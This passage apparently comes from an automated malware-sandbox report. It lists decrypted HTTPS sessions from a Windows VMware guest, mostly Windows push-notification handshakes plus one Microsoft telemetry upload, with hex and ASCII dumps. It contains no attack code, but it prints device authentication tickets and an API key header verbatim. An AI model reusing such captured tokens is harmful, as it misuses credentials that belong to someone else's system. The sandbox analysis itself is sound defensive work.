                                                                                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: hHJc/xRo70eQhxjo.2Context: 60f9ce8dd851d4a1<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdK90ncoUiekl9XszFvxrcmgag9H1OhqgjJK0BXKl8U89pusgBW9/FuP5G5JeJ9zFfpTxBlbhwbc3NkRw2GswabgY42LqgdT+KzIxkDgbYuEps
                                                                                        2024-07-24 05:16:15 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 68 48 4a 63 2f 78 52 6f 37 30 65 51 68 78 6a 6f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 30 66 39 63 65 38 64 64 38 35 31 64 34 61 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: hHJc/xRo70eQhxjo.3Context: 60f9ce8dd851d4a1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                        2024-07-24 05:16:15 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                        Data Ascii: 202 1 CON 58
                                                                                        2024-07-24 05:16:15 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4d 64 38 4f 7a 55 72 78 2f 45 65 4c 52 37 58 72 79 79 4a 4a 66 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                        Data Ascii: MS-CV: Md8OzUrx/EeLR7XryyJJfQ.0Payload parsing failed.


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        32192.168.2.65014840.115.3.253443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:17:33 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 47 76 33 47 51 38 6f 6c 6b 55 4f 55 4c 48 37 77 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 34 32 64 32 39 33 66 64 32 38 37 33 63 64 30 0d 0a 0d 0a
                                                                                        Data Ascii: CNT 1 CON 305MS-CV: Gv3GQ8olkUOULH7w.1Context: 442d293fd2873cd0
                                                                                        2024-07-24 05:17:33 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                        2024-07-24 05:17:33 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 47 76 33 47 51 38 6f 6c 6b 55 4f 55 4c 48 37 77 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 34 32 64 32 39 33 66 64 32 38 37 33 63 64 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4b 39 30 6e 63 6f 55 69 65 6b 6c 39 58 73 7a 46 76 78 72 63 6d 67 61 67 39 48 31 4f 68 71 67 6a 4a 4b 30 42 58 4b 6c 38 55 38 39 70 75 73 67 42 57 39 2f 46 75 50 35 47 35 4a 65 4a 39 7a 46 66 70 54 78 42 6c 62 68 77 62 63 33 4e 6b 52 77 32 47 73 77 61 62 67 59 34 32 4c 71 67 64 54 2b 4b 7a 49 78 6b 44 67 62 59 75 45 70 73
                                                                                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: Gv3GQ8olkUOULH7w.2Context: 442d293fd2873cd0<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdK90ncoUiekl9XszFvxrcmgag9H1OhqgjJK0BXKl8U89pusgBW9/FuP5G5JeJ9zFfpTxBlbhwbc3NkRw2GswabgY42LqgdT+KzIxkDgbYuEps
                                                                                        2024-07-24 05:17:33 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 47 76 33 47 51 38 6f 6c 6b 55 4f 55 4c 48 37 77 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 34 32 64 32 39 33 66 64 32 38 37 33 63 64 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: Gv3GQ8olkUOULH7w.3Context: 442d293fd2873cd0<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                        2024-07-24 05:17:33 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                        Data Ascii: 202 1 CON 58
                                                                                        2024-07-24 05:17:33 UTC58INData Raw: 4d 53 2d 43 56 3a 20 59 6d 6c 58 41 51 64 66 6e 55 57 57 4e 6e 54 75 49 6a 32 70 48 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                        Data Ascii: MS-CV: YmlXAQdfnUWWNnTuIj2pHQ.0Payload parsing failed.


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        33192.168.2.65034340.113.110.67443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:18:55 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 44 65 6c 69 44 43 49 58 6d 30 43 65 78 2b 4c 75 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 38 35 62 35 62 62 37 38 65 31 38 35 33 30 62 0d 0a 0d 0a
                                                                                        Data Ascii: CNT 1 CON 305MS-CV: DeliDCIXm0Cex+Lu.1Context: 985b5bb78e18530b
                                                                                        2024-07-24 05:18:55 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                        2024-07-24 05:18:55 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 44 65 6c 69 44 43 49 58 6d 30 43 65 78 2b 4c 75 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 38 35 62 35 62 62 37 38 65 31 38 35 33 30 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4b 39 30 6e 63 6f 55 69 65 6b 6c 39 58 73 7a 46 76 78 72 63 6d 67 61 67 39 48 31 4f 68 71 67 6a 4a 4b 30 42 58 4b 6c 38 55 38 39 70 75 73 67 42 57 39 2f 46 75 50 35 47 35 4a 65 4a 39 7a 46 66 70 54 78 42 6c 62 68 77 62 63 33 4e 6b 52 77 32 47 73 77 61 62 67 59 34 32 4c 71 67 64 54 2b 4b 7a 49 78 6b 44 67 62 59 75 45 70 73
                                                                                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: DeliDCIXm0Cex+Lu.2Context: 985b5bb78e18530b<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdK90ncoUiekl9XszFvxrcmgag9H1OhqgjJK0BXKl8U89pusgBW9/FuP5G5JeJ9zFfpTxBlbhwbc3NkRw2GswabgY42LqgdT+KzIxkDgbYuEps
                                                                                        2024-07-24 05:18:55 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 44 65 6c 69 44 43 49 58 6d 30 43 65 78 2b 4c 75 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 38 35 62 35 62 62 37 38 65 31 38 35 33 30 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: DeliDCIXm0Cex+Lu.3Context: 985b5bb78e18530b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                        2024-07-24 05:18:55 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                        Data Ascii: 202 1 CON 58
                                                                                        2024-07-24 05:18:55 UTC58INData Raw: 4d 53 2d 43 56 3a 20 48 50 34 36 62 49 4d 46 49 30 61 58 76 42 73 35 65 76 33 32 38 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                        Data Ascii: MS-CV: HP46bIMFI0aXvBs5ev328Q.0Payload parsing failed.


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        34192.168.2.65035713.89.179.11443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:19:01 UTC828OUTPOST /OneCollector/1.0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521
                                                                                        AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENX7wUC+MYl+R+dP6Ge+Ps/gAK2S4rAvLsS9lNlstWnrY2Ovw6/QYWUW40yWi3W2oq2TgmfD/F4rhcGc/Q3kxTRWn1J3nPhOAny4YuIpbKp/JxVo2IKfr0u2Ob+Xasi+8kVvlgcJFM/02j6m9rZf8SsufBGSnZuCNcAMbSRQwAt9ttIddTRQ/7dkFG7ZzhfDKlscCwPqu8roSfIr2wEDw126PJnTg8kgpdZV8FhO09Z9yZkJbvNRCuX40AaiKTP7/kep+t5XHG1Tp05wc6bODUUz8SiWkHpg7isRn5nplH5Pwj6qy8wfjiPn8r9T6Iz9u6hFIAE=&p=
                                                                                        Client-Id: NO_AUTH
                                                                                        Content-Encoding: deflate
                                                                                        Content-Type: application/bond-compact-binary
                                                                                        Expect: 100-continue
                                                                                        SDK-Version: EVT-Windows-C++-No-3.4.15.1
                                                                                        Upload-Time: 1721798339337
                                                                                        Host: self.events.data.microsoft.com
                                                                                        Content-Length: 7973
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-07-24 05:19:01 UTC7973OUTData Raw: ed 7c 5b ac 5c d7 79 de e8 12 96 a2 28 8a 96 64 59 92 15 8b 21 64 d7 8a 67 4e d7 fd 32 68 10 53 24 65 51 11 4d 95 87 92 5c 03 01 bb 67 66 cf 9c 4d ce cc 3e 9a 0b 2f 42 1e 04 3f 04 48 81 14 a5 81 00 45 9f 8c 02 2d 22 a0 09 fa d0 3e 24 4f 7e c8 43 1c 06 28 8a a2 4f 2e 8a b4 40 5b 20 40 81 a0 68 fb d2 3e f4 fb d7 be ad 59 3c a2 1d c3 10 62 80 07 24 0f ff b5 d6 5e d7 ff ff fe ef 5f 6b ed fd c6 13 72 8f 5d 52 57 a6 d3 62 9c 5f df bf bb de e4 8b fa d7 db 79 36 df 1c 5c ce 37 d9 24 db 64 17 f2 5b 28 71 be 5c ae cb 79 81 84 7c f2 d1 5f fe f0 3f fd f9 ff f8 ef ff e1 3f 7e e1 d3 b3 e5 70 3c 71 d2 18 61 0c e7 63 35 ce b2 cc 4d c7 7a 24 72 2b 5c 9e 3b 3e f9 77 c7 be f7 e4 fd 2f 9e 78 ac 38 f9 c1 e5 db d9 2a ef 9f b9 b4 1c ef fd ce 89 4a 12 ac cf 7b f7 5f 3c f1 58 ef
                                                                                        Data Ascii: |[\y(dY!dgN2hS$eQM\gfM>/B?HE-">$O~C(O.@[ @h>Y<b$^_kr]RWb_y6\7$d[(q\y|_??~p<qac5Mz$r+\;>w/x8*J{_<X
                                                                                        2024-07-24 05:19:01 UTC25INHTTP/1.1 100 Continue
                                                                                        2024-07-24 05:19:01 UTC443INHTTP/1.1 200 OK
                                                                                        Content-Length: 9
                                                                                        Content-Type: application/json
                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        time-delta-millis: 1828
                                                                                        Access-Control-Allow-Headers: time-delta-millis
                                                                                        Access-Control-Allow-Methods: POST
                                                                                        Access-Control-Allow-Credentials: true
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                        Date: Wed, 24 Jul 2024 05:19:00 GMT
                                                                                        Connection: close
                                                                                        {"acc":4}


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        35192.168.2.65058640.113.110.67443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:20:43 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6e 45 31 32 6b 7a 70 73 4d 55 65 69 33 30 4a 7a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 31 35 61 32 31 37 62 39 30 37 37 31 65 34 62 0d 0a 0d 0a
                                                                                        Data Ascii: CNT 1 CON 305MS-CV: nE12kzpsMUei30Jz.1Context: 615a217b90771e4b
                                                                                        2024-07-24 05:20:43 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                        2024-07-24 05:20:43 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 6e 45 31 32 6b 7a 70 73 4d 55 65 69 33 30 4a 7a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 31 35 61 32 31 37 62 39 30 37 37 31 65 34 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4b 39 30 6e 63 6f 55 69 65 6b 6c 39 58 73 7a 46 76 78 72 63 6d 67 61 67 39 48 31 4f 68 71 67 6a 4a 4b 30 42 58 4b 6c 38 55 38 39 70 75 73 67 42 57 39 2f 46 75 50 35 47 35 4a 65 4a 39 7a 46 66 70 54 78 42 6c 62 68 77 62 63 33 4e 6b 52 77 32 47 73 77 61 62 67 59 34 32 4c 71 67 64 54 2b 4b 7a 49 78 6b 44 67 62 59 75 45 70 73
                                                                                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: nE12kzpsMUei30Jz.2Context: 615a217b90771e4b<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdK90ncoUiekl9XszFvxrcmgag9H1OhqgjJK0BXKl8U89pusgBW9/FuP5G5JeJ9zFfpTxBlbhwbc3NkRw2GswabgY42LqgdT+KzIxkDgbYuEps
                                                                                        2024-07-24 05:20:43 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6e 45 31 32 6b 7a 70 73 4d 55 65 69 33 30 4a 7a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 31 35 61 32 31 37 62 39 30 37 37 31 65 34 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: nE12kzpsMUei30Jz.3Context: 615a217b90771e4b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                        2024-07-24 05:20:44 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                        Data Ascii: 202 1 CON 58
                                                                                        2024-07-24 05:20:44 UTC58INData Raw: 4d 53 2d 43 56 3a 20 47 4c 55 6a 6b 46 39 4b 2b 6b 4b 49 74 77 6e 75 44 4c 4e 77 6b 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                        Data Ascii: MS-CV: GLUjkF9K+kKItwnuDLNwkw.0Payload parsing failed.


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        36192.168.2.66236040.113.110.67443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:22:46 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 66 4d 6f 45 6a 59 44 6d 46 55 47 2b 5a 51 58 38 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 65 62 39 36 64 30 66 61 63 65 65 34 33 30 0d 0a 0d 0a
                                                                                        Data Ascii: CNT 1 CON 305MS-CV: fMoEjYDmFUG+ZQX8.1Context: deeb96d0facee430
                                                                                        2024-07-24 05:22:46 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                        2024-07-24 05:22:46 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 66 4d 6f 45 6a 59 44 6d 46 55 47 2b 5a 51 58 38 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 65 62 39 36 64 30 66 61 63 65 65 34 33 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4b 39 30 6e 63 6f 55 69 65 6b 6c 39 58 73 7a 46 76 78 72 63 6d 67 61 67 39 48 31 4f 68 71 67 6a 4a 4b 30 42 58 4b 6c 38 55 38 39 70 75 73 67 42 57 39 2f 46 75 50 35 47 35 4a 65 4a 39 7a 46 66 70 54 78 42 6c 62 68 77 62 63 33 4e 6b 52 77 32 47 73 77 61 62 67 59 34 32 4c 71 67 64 54 2b 4b 7a 49 78 6b 44 67 62 59 75 45 70 73
                                                                                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: fMoEjYDmFUG+ZQX8.2Context: deeb96d0facee430<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdK90ncoUiekl9XszFvxrcmgag9H1OhqgjJK0BXKl8U89pusgBW9/FuP5G5JeJ9zFfpTxBlbhwbc3NkRw2GswabgY42LqgdT+KzIxkDgbYuEps
                                                                                        2024-07-24 05:22:46 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 66 4d 6f 45 6a 59 44 6d 46 55 47 2b 5a 51 58 38 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 65 62 39 36 64 30 66 61 63 65 65 34 33 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: fMoEjYDmFUG+ZQX8.3Context: deeb96d0facee430<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                        2024-07-24 05:22:46 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                        Data Ascii: 202 1 CON 58
                                                                                        2024-07-24 05:22:46 UTC58INData Raw: 4d 53 2d 43 56 3a 20 58 32 36 56 5a 43 6b 6b 77 55 2b 57 6c 4a 4f 39 69 78 77 6e 2b 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                        Data Ascii: MS-CV: X26VZCkkwU+WlJO9ixwn+w.0Payload parsing failed.


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

